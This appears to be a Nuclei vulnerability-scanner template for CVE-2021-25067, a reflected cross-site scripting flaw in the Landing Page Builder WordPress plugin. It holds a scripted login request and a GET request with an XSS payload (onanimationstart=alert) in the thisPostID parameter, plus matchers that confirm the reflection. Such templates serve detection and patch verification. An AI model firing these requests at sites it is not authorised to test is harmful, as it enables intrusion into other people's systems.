50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: CVE-2021-25067
|
|
|
|
info:
|
|
name: Landing Page Builder < 1.4.9.6 - Cross-Site Scripting
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc
|
|
- https://wordpress.org/plugins/page-builder-add/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-25067
|
|
remediation: Fixed in version 1.4.9.6.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2021-25067
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00092
|
|
cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
framework: wordpress
|
|
vendor: pluginops
|
|
product: landing_page
|
|
tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(content_type_2, "text/html")'
|
|
- 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")'
|
|
- 'contains(body_2, "Enter Page Title")'
|
|
condition: and
|